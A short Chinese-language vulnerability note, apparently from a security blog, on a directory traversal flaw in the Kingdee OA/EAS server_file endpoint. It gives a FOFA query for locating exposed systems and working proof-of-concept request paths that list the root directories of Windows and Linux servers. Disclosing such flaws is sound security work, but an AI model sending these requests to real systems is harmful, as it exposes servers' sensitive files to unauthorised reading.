# 金蝶OA server_file 目录遍历漏洞
## 漏洞描述
金蝶OA server_file 存在目录遍历漏洞,攻击者通过目录遍历可以获取服务器敏感信息
## 漏洞影响
> 金蝶OA
## FOFA
> app=”Kingdee-EAS”
## 漏洞复现
登录界面为
![](/static/qingy/金蝶OA_server_file_目录遍历漏洞/img/1.png)
漏洞POC
“`
Windows服务器
appmonitor/protected/selector/server_file/files?folder=C://&suffix=
Linux服务器
appmonitor/protected/selector/server_file/files?folder=/&suffix=
“`
![2](/static/qingy/金蝶OA_server_file_目录遍历漏洞/img/20.png)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容